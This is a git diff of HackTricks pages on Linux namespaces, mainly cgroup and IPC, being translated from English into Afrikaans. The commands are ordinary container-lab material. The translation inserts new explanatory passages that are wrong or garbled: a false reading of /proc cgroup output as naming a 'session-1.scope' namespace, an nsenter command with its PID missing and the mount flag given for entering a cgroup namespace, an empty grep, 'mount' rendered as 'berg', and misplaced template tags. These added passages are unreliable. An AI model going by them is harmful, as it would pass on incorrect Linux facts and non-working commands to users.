jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 79ed96379..bea1eec3b 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -2,61 +2,61 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### **PID namespace** +### **PID-namespace** {% content-ref url="pid-namespace.md" %} [pid-namespace.md](pid-namespace.md) {% endcontent-ref %} -### **Mount namespace** +### **Mount-namespace** {% content-ref url="mount-namespace.md" %} [mount-namespace.md](mount-namespace.md) {% endcontent-ref %} -### **Network namespace** +### **Netwerk-namespace** {% content-ref url="network-namespace.md" %} [network-namespace.md](network-namespace.md) {% endcontent-ref %} -### **IPC Namespace** +### **IPC-namespace** {% content-ref url="ipc-namespace.md" %} [ipc-namespace.md](ipc-namespace.md) {% endcontent-ref %} -### **UTS namespace** +### **UTS-namespace** {% content-ref url="uts-namespace.md" %} [uts-namespace.md](uts-namespace.md) {% endcontent-ref %} -### Time Namespace +### Tyd-namespace {% content-ref url="time-namespace.md" %} [time-namespace.md](time-namespace.md) {% endcontent-ref %} -### User namespace +### Gebruikers-namespace {% content-ref url="user-namespace.md" %} [user-namespace.md](user-namespace.md) {% endcontent-ref %} -### CGroup Namespace +### CGroup-namespace {% content-ref url="cgroup-namespace.md" %} [cgroup-namespace.md](cgroup-namespace.md) @@ -64,14 +64,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index 1d39d58c6..f909789bc 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -1,85 +1,105 @@ -# CGroup Namespace +# CGroup-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A cgroup namespace is a Linux kernel feature that provides **isolation of cgroup hierarchies for processes running within a namespace**. Cgroups, short for **control groups**, are a kernel feature that allows organizing processes into hierarchical groups to manage and enforce **limits on system resources** like CPU, memory, and I/O. +'n Cgroup-namespace is 'n Linux-kernelkenmerk wat **afsondering van cgroup-hierargieë vir prosesse wat binne 'n namespace loop, bied**. Cgroups, afkorting vir **beheergroepe**, is 'n kernelkenmerk wat dit moontlik maak om prosesse in hiërargiese groepe te organiseer om **grense op stelselhulpbronne** soos CPU, geheue en I/O te bestuur en af te dwing. -While cgroup namespaces are not a separate namespace type like the others we discussed earlier (PID, mount, network, etc.), they are related to the concept of namespace isolation. **Cgroup namespaces virtualize the view of the cgroup hierarchy**, so that processes running within a cgroup namespace have a different view of the hierarchy compared to processes running in the host or other namespaces. +Alhoewel cgroup-namespaces nie 'n aparte tipe namespace is soos die ander wat ons vroeër bespreek het (PID, berg, netwerk, ens.), is hulle verwant aan die konsep van namespace-afsondering. **Cgroup-namespaces virtualiseer die siening van die cgroup-hierargie**, sodat prosesse wat binne 'n cgroup-namespace loop, 'n ander siening van die hierargie het in vergelyking met prosesse wat in die gasheer of ander namespaces loop. -### How it works: +### Hoe dit werk: -1. When a new cgroup namespace is created, **it starts with a view of the cgroup hierarchy based on the cgroup of the creating process**. This means that processes running in the new cgroup namespace will only see a subset of the entire cgroup hierarchy, limited to the cgroup subtree rooted at the creating process's cgroup. -2. Processes within a cgroup namespace will **see their own cgroup as the root of the hierarchy**. This means that, from the perspective of processes inside the namespace, their own cgroup appears as the root, and they cannot see or access cgroups outside of their own subtree. -3. Cgroup namespaces do not directly provide isolation of resources; **they only provide isolation of the cgroup hierarchy view**. **Resource control and isolation are still enforced by the cgroup** subsystems (e.g., cpu, memory, etc.) themselves. +1. Wanneer 'n nuwe cgroup-namespace geskep word, **begin dit met 'n siening van die cgroup-hierargie gebaseer op die cgroup van die skeppende proses**. Dit beteken dat prosesse wat in die nuwe cgroup-namespace loop, slegs 'n subset van die volledige cgroup-hierargie sal sien, beperk tot die cgroup-subboom wat wortel by die skeppende proses se cgroup. +2. Prosesse binne 'n cgroup-namespace sal **hul eie cgroup as die wortel van die hierargie sien**. Dit beteken dat, vanuit die perspektief van prosesse binne die namespace, hul eie cgroup as die wortel voorkom, en hulle kan nie cgroups buite hul eie subboom sien of toegang daartoe verkry nie. +3. Cgroup-namespaces bied nie direkte afsondering van hulpbronne nie; **hulle bied slegs afsondering van die siening van die cgroup-hierargie**. **Hulpbronbeheer en afsondering word steeds afgedwing deur die cgroup-subsisteme (bv. cpu, geheue, ens.) self. -For more information about CGroups check: +Vir meer inligting oor CGroups, kyk na: {% content-ref url="../cgroups.md" %} [cgroups.md](../cgroups.md) {% endcontent-ref %} -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Namespaces #### CLI - ```bash sudo unshare -C [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken by die skep van 'n nuwe proses nie, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/cgroup +``` + +Hierdie opdrag sal die inhoud van die `cgroup`-lêer vir jou huidige proses (`$$`) vertoon. Die `cgroup`-lêer bevat inligting oor die groepe waaraan jou proses behoort, insluitend die namespace-inligting. + +As jy die uitset van hierdie opdrag sien, sal jy 'n pad sien wat die woord "namespace" bevat. Byvoorbeeld: + +``` +11:memory:/user.slice/user-1000.slice/session-1.scope +10:devices:/user.slice/user-1000.slice/session-1.scope +9:pids:/user.slice/user-1000.slice/session-1.scope +8:cpu,cpuacct:/user.slice/user-1000.slice/session-1.scope +7:net_cls,net_prio:/user.slice/user-1000.slice/session-1.scope +6:freezer:/user.slice/user-1000.slice/session-1.scope +5:perf_event:/user.slice/user-1000.slice/session-1.scope +4:blkio:/user.slice/user-1000.slice/session-1.scope +3:rdma:/ +2:cpuset:/user.slice/user-1000.slice/session-1.scope +1:name=systemd:/user.slice/user-1000.slice/session-1.scope +``` + +In hierdie voorbeeld is die proses in die `session-1.scope`-namespace. ```bash ls -l /proc/self/ns/cgroup lrwxrwxrwx 1 root root 0 Apr 4 21:19 /proc/self/ns/cgroup -> 'cgroup:[4026531835]' ``` - -### Find all CGroup namespaces +### Vind alle CGroup-ruimtes {% code overflow="wrap" %} ```bash @@ -89,27 +109,41 @@ sudo find /proc -maxdepth 3 -type l -name cgroup -exec ls -l {} \; 2>/dev/null ``` {% endcode %} -### Enter inside an CGroup namespace +### Betree 'n CGroup-namespace +Om toegang te verkry tot 'n CGroup-namespace, kan jy die volgende stappe volg: + +1. Identifiseer die proses ID (PID) van die teikenproses waarin jy wil binnekom. +2. Voer die volgende opdrag uit om die PID van die proses te bekom: + ``` + ps aux | grep + ``` +3. Identifiseer die CGroup-vlak waarin die proses bestaan. Jy kan dit doen deur die inhoud van die `/proc//cgroup`-lêer te ondersoek. +4. Voer die volgende opdrag uit om binne die CGroup-namespace van die proses in te gaan: + ``` + nsenter -t -m + ``` + Hiermee sal jy binne die CGroup-namespace van die proses ingaan en toegang verkry tot die verbandhoudende hulpbronne en beperkings. + +Dit is belangrik om te onthou dat jy oor voldoende bevoorregting moet beskik om hierdie stappe uit te voer. ```bash nsenter -C TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/cgroup`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/cgroup`). - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md index adb562e89..a06bc7594 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md @@ -1,77 +1,84 @@ -# IPC Namespace +# IPC-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -An IPC (Inter-Process Communication) namespace is a Linux kernel feature that provides **isolation** of System V IPC objects, such as message queues, shared memory segments, and semaphores. This isolation ensures that processes in **different IPC namespaces cannot directly access or modify each other's IPC objects**, providing an additional layer of security and privacy between process groups. +'n IPC (Inter-Process Communication)-naamruimte is 'n Linux-kernelkenmerk wat **afsondering** van System V IPC-voorwerpe bied, soos boodskaprye, gedeelde geheue-segmente en semafore. Hierdie afsondering verseker dat prosesse in **verskillende IPC-naamruimtes nie direk toegang tot of wysiging van mekaar se IPC-voorwerpe kan hê nie**, wat 'n addisionele laag van veiligheid en privaatheid tussen prosesgroepe bied. -### How it works: +### Hoe dit werk: -1. When a new IPC namespace is created, it starts with a **completely isolated set of System V IPC objects**. This means that processes running in the new IPC namespace cannot access or interfere with the IPC objects in other namespaces or the host system by default. -2. IPC objects created within a namespace are visible and **accessible only to processes within that namespace**. Each IPC object is identified by a unique key within its namespace. Although the key may be identical in different namespaces, the objects themselves are isolated and cannot be accessed across namespaces. -3. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWIPC` flag. When a process moves to a new namespace or creates one, it will start using the IPC objects associated with that namespace. +1. Wanneer 'n nuwe IPC-naamruimte geskep word, begin dit met 'n **volledig afgesonderde stel System V IPC-voorwerpe**. Dit beteken dat prosesse wat in die nuwe IPC-naamruimte loop, nie standaard toegang tot of inmenging met die IPC-voorwerpe in ander naamruimtes of die gasheerstelsel kan hê nie. +2. IPC-voorwerpe wat binne 'n naamruimte geskep word, is slegs sigbaar en **toeganklik vir prosesse binne daardie naamruimte**. Elke IPC-voorwerp word geïdentifiseer deur 'n unieke sleutel binne sy naamruimte. Alhoewel die sleutel dieselfde kan wees in verskillende naamruimtes, is die voorwerpe self afgesonderd en kan nie oor naamruimtes heen toegang verkry nie. +3. Prosesse kan tussen naamruimtes beweeg deur die `setns()`-sisteemaanroep te gebruik of nuwe naamruimtes te skep deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWIPC`-vlag te gebruik. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, begin dit die IPC-voorwerpe wat met daardie naamruimte geassosieer word, gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -i [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weesouerprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken by die skep van 'n nuwe proses nie, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +ls -l /proc/$$/ns/ipc +``` + +Hier is die betekenis van die opdrag: + +- `ls -l`: Gee 'n gedetailleerde lys van die spesifiseerde lêer. +- `/proc/$$/ns/ipc`: Die pad na die IPC-namespace van die huidige proses. + +As die uitset van die opdrag 'n simboliese skakel na 'n lêer in die `/proc`-sisteem is, beteken dit dat jou proses in daardie spesifieke namespace is. ```bash ls -l /proc/self/ns/ipc lrwxrwxrwx 1 root root 0 Apr 4 20:37 /proc/self/ns/ipc -> 'ipc:[4026531839]' ``` - -### Find all IPC namespaces +### Vind alle IPC-ruimtes {% code overflow="wrap" %} ```bash @@ -79,18 +86,17 @@ sudo find /proc -maxdepth 3 -type l -name ipc -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name ipc -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree binne 'n IPC-namespace + {% endcode %} - -### Enter inside an IPC namespace - ```bash nsenter -i TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy kan **nie** **toegang kry tot 'n ander namespace sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/net`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - -### Create IPC object - +### Skep IPC-voorwerp ```bash # Container sudo unshare -i /bin/bash @@ -99,28 +105,27 @@ Shared memory id: 0 ipcs -m ------ Shared Memory Segments -------- -key shmid owner perms bytes nattch status -0x2fba9021 0 root 644 100 0 +key shmid owner perms bytes nattch status 